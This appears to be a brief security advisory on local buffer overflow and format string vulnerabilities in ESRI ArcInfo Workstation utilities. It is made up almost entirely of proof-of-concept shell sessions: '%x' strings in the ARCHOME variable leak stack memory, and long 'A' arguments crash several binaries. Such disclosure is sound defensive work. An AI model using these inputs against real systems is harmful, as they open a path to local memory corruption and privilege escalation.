|
ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
The following proof-of-concept examples were provided: -bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x -bash-2.05b$ ./wservice Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run! -bash-2.05b# export ARCHOME=%x.%x.%x.%x -bash-2.05b# ./lockmgr Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run! -bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b FATAL ERROR Segment Violation -bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a FATAL ERROR Segment Violation -bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'` FATAL ERROR Segment Violation -bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'` FATAL ERROR Segment Violation -bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'` FATAL ERROR Segment Violation -bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a FATAL ERROR Segment Violation Exploit code was also released for the 'wservice' format string vulnrability. |
|
 Privacy Statement |
